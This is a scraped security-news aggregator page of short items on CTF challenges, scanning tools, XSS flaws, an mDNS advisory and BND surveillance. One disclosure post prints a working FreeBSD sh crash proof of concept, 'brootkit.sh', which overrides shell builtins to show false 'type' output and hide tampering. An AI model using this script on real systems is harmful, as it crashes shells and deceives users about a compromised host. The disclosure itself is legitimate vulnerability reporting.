Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

0ctf 2015 quals – forward (web250)

$
0
0
At the start we’ve only got an url to our target webserver:
Bildschirmfoto 2015-03-30 um 18.14.33

When we click on “Login” we get a javascript popup which tells us “You Are Not Authorized!”. Then we click on “FLAG”, because that’s what we want. Unfortunately we don’t get a flag yet, but the source code of admin.php is revealed.

more here......http://blog.squareroots.de/en/2015/03/0ctf-2015-quals-forward-web250/

nmap2nessus Release and Slides From Black Hat Asia Arsenal 2015

$
0
0
How nmap2nessus works:
Takes a nmap XML file as input and extracts the 'open' ports and live IP addresses.
Logins into Nessus server and makes a copy of the 'selected' policy.
Modifies the port_range parameter in the policy settings and upload the new policy
Uses the 'default' Nessus policy.
Starts a new Nessus scan using the new policy.
Queries the Nessus server for the status of the job until the job is completed.
Save the Nessus report and extract the important findings


more here......https://github.com/milo2012/nmap2nessus

and slides here....http://www.slideshare.net/keith55/nmap2nessus-presentation-slides-at-black-hat-asia-arsenal-2015?qid=ec52197a-2e0f-4638-a7aa-d70e22bbc265&v=default&b=&from_search=1

metasploitHelper Release and Slides at Blackhat Asia Arsenal 2015

Airbnb JavaScript Style Guide

Detection, analysis and display of attacks using Honeypots

$
0
0
Thanks to the use of honeypots   (open a new window)and the analysis of the data they generate we can scope the magnitude of the problem we face, obtaining valuable data regarding:

Attack tendencies.
Exploited vulnerabilities.
Services that are intended on being compromised.
Most active countries in cyberattacks.
Malware samples unidentified by antivirus engines.
Techniques used by attackers.
Malware distributors.
Systems belonging to Botnets.
Command and Control Centers (C&C).

more here...........https://www.incibe.es/blogs/post/Security/SecurityBlog/Article_and_comments/honeystation_EN

REVERSE ENGINEERING AN RC SPY TANK

$
0
0


[Michael] sells a remote control spy tank through his company, and although it’s a toy, there’s an impressive amount of electronics in this R/C tank. It’s controlled from an Android or iDevice over a WiFi connection, something that simply won’t do if you’re trying to sell this to the hacker and maker crowd. The solution to this problem is Wireshark, and with a little bit of work this spy tank can be controlled from just about anything, from a microcontroller via WiFi to a Python app.

more here..........http://hackaday.com/2015/03/30/reverse-engineering-an-rc-spy-tank/

THE SAD STATE OF SMTP ENCRYPTION

Introducing VirtuaPlant 0.1, Industrial Control System Simulator with Physics UI, Soft-PLC (modbus enabled), networked HMI and some ready-made skiddies attack scripts


DOMPurify 0.6.2 release

$
0
0
DOMPurify the DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG 0.6.2 here.......https://github.com/cure53/DOMPurify/releases/tag/0.6.2


and for those not familiar with DOMPurify here is additional info......https://github.com/cure53/DOMPurify

XSS flaws expose weaknesses on Amazon and UK newspaper websites

$
0
0
Cross-site scripting (XSS) flaws are amongst the most commonly encountered security flaws found on websites, opening up opportunities for malicious hackers to hijack customer accounts, change users’ settings and phish login credentials.
Unfortunately, it only requires a single web developer to make a mistake to open up opportunities which online criminals can exploit to launch potentially dangerous attacks.
And, although you would like to think that some of the world’s busiest websites would have trained their staff to avoid making the code blunders which can lead to an XSS attack, time and time again we hear of high profile vulnerabilities being found in familiar places.

more here.......http://blog.lumension.com/9973/xss-flaws-expose-weaknesses-on-amazon-and-uk-newspaper-websites/

CTF challenges on docker hub

FreeBSD/SH Stack Overflow Vulnerability

$
0
0
I found sh have a stack overflow bug on freebsd(9.0-10.0),  it may be
triggered on all freebsd systems, but i have not tested yet. the poc below
is tested on freebsd10.0 amd64 arch:

$ ls
brootkit.sh
$ . brootkit.sh
$ command
$ ls
brootkit.sh sh.core

(gdb) x/16x $rsp+0x1b8
0x7fffdfffeff8: Cannot access memory at address 0x7fffdfffeff8
(gdb) x/16x $rsp+0x1c0
0x7fffdffff000: 0x0000000000000000 0x0000000000000000
0x7fffdffff010: 0x0000000000000000 0x0000000000000000
0x7fffdffff020: 0x0000000000000000 0x0000000000000000
0x7fffdffff030: 0x0000000000000000 0x0000000000000000
0x7fffdffff040: 0x0000000000000000 0x0000000000000000
0x7fffdffff050: 0x0000000000000000 0x0000000000000000
0x7fffdffff060: 0x0000000000000000 0x0000000000000000
0x7fffdffff070: 0x0000000000000000 0x0000000000000000

(gdb) disass malloc malloc+32
Dump of assembler code from 0x800d593f0 to 0x800d59410:
0x0000000800d593f0 <malloc+0>: push %rbp
0x0000000800d593f1 <malloc+1>: mov %rsp,%rbp
0x0000000800d593f4 <malloc+4>: push %r15
0x0000000800d593f6 <malloc+6>: push %r14
0x0000000800d593f8 <malloc+8>: push %r13
0x0000000800d593fa <malloc+10>: push %r12
0x0000000800d593fc <malloc+12>: push %rbx
0x0000000800d593fd <malloc+13>: sub $0x488,%rsp
0x0000000800d59404 <malloc+20>: mov %rdi,-0x4a0(%rbp)
0x0000000800d5940b <malloc+27>: mov 0x2c2dbe(%rip),%rax #
0x80101c1d0 <__nsdefaultsrc+4928>


set $i=0
set $addr=$rbp
while ($i <= 1000)
printf "frame[%d] 0x%lx ==> 0x%lx retaddr: 0x%lx\t diass: ", $i, $addr,
*(long *)$addr, *(long *)($addr+8)
x/i *(long *)($addr+8)
set $i=$i+1
set $addr=*(long *)$addr
end

frame[98] 0x7fffe0004c00 ==> 0x7fffe0004d60 retaddr: 0x406465 diass:
0x406465 <execve () plt+14073>: incq 0x21d694(%rip) # 0x623b00
<environ+64>
frame[99] 0x7fffe0004d60 ==> 0x7fffe0004e10 retaddr: 0x40513b diass:
0x40513b <execve () plt+9167>: mov -0x74(%rbp),%r14d
frame[100] 0x7fffe0004e10 ==> 0x7fffe0004ec0 retaddr: 0x405118 diass:
0x405118 <execve () plt+9132>: cmpl $0x0,0x21e9f5(%rip) #
0x623b14 <environ+84>

poc:

#!/bin/sh

BR_ROOTKIT_PATH="."

builtin()
{
local fake_a

unset command
case $1 in
"set"|"unset"|"command"|"type")
fake_a="$(command builtin $1 $2)"
br_hide_engine "$fake_a"
reset_command
return ;;
"builtin")
echo "sh: builtin: builtin: syntax error, sh is not
support."
reset_command
return ;;
*)
command builtin $1 $2
reset_command
;;
esac
}

type()
{
case $1 in
"builtin"|"set"|"unset"|"type")
echo "$1 is a shell builtin"
return ;;
"dir")
echo "dir is /usr/bin/dir"
return ;;
"ls")
echo "ls is aliased to ls --color=tty"
return ;;
"ps")
echo "ps is /bin/ps"
return ;;
"netstat")
echo "netstat is hashed (/usr/bin/netstat)"
return ;;
"/bin/ls"|"/usr/bin/dir"|"/bin/ps"|"/usr/bin/netstat")
echo "$1 is $1"
return ;;
*)
unset command
command type $1 $2
reset_command
return ;;
esac
}

fake_unset()
{
case $1 in
"builtin"|"command"|"set"|"unset"|"type")
echo "sh: syntax error, sh is not support."
return ;;
*)
unset $1 $2
return ;;
esac
}

fake_command()
{
case $1 in
"builtin"|"command"|"set"|"unset"|"type")
echo "sh: syntax error, sh is not support."
return ;;
*)
unset command
command $1 $2
reset_command
return ;;
esac
}

command()
{
case $1 in
"builtin")
builtin $2 $3
return ;;
"unset")
fake_unset $2 $3
. $BR_ROOTKIT_PATH/brootkit.sh
return ;;
"type")
type $2 $3
return ;;
"command")
fake_command $2 $3
return ;;
*)
unset command
command $2 $3
. $BR_ROOTKIT_PATH/brootkit.sh
return ;;
esac
}

reset_command()
{
command()
{
case $1 in
"builtin")
builtin $2 $3
return ;;
"set")
set $2 $3
return ;;
"unset")
fake_unset $2 $3
. $BR_ROOTKIT_PATH/brootkit.sh
return ;;
"type")
type $2 $3
return ;;
"command")
fake_command $2 $3
return ;;
*)
unset command
command $2 $3
. $BR_ROOTKIT_PATH/brootkit.sh
return ;;
esac
}
}


Authored by wzt wzt 
wzt.wzt@gmail com

New reconnaissance threat Trojan.Laziok targets the energy sector

Bcrypt is great, but is password cracking “infeasible”?

Tails 1.3.2 is out. That was fast!


How the German Foreign Intelligence Agency BND tapped the Internet Exchange Point DE-CIX in Frankfurt, since 2009

$
0
0
Since 2009 the German intelligence agency BND accesses traffic from the internet node DE-CIX in Frankfurt am Main – as a follow-up to „Operation Eikonal“ at the German company „Deutsche Telekom“. This was stated by the operator of DE-CIX at the NSA investigation comittee of the German Bundestag. The German Chancellery intervened several times and prevented the G-10 commission and the Federal Network Agency (Bundesnetzagentur) to investigate this interception operation.

This is an english translation of the summary of Klaus Landefeld‘s statements as a witness in front of the German Parliamentary Committee investigating the NSA spying scandal here......https://netzpolitik.org/2015/how-the-german-foreign-intelligence-agency-bnd-tapped-the-internet-exchange-point-de-cix-in-frankfurt-since-2009/

FCC Explains Decisions on Broadband, Net Neutrality

[VU#550620] Multicast DNS (mDNS) Misconfiguration Can Lead to Information Disclosure & DDoS Reflection & Amplification. 100,000 Devices Replied to mDNS Queries Over the Internet

$
0
0
Multicast DNS and DNS service discovery daemons deployed on various systems across the Internet are misconfigured and reply to queries targeting their unicast addresses, including requests from their WAN interface. These daemons could be leveraged by attackers for sensitive information disclosure and potentially used in DDoS campaigns for reflection and in some cases amplification.

more here....http://www.kb.cert.org/vuls/id/550620

and here.....https://github.com/chadillac/mdns_recon

How I could delete any video on YouTube

bash-pass

Viewing all 8064 articles
Browse latest View live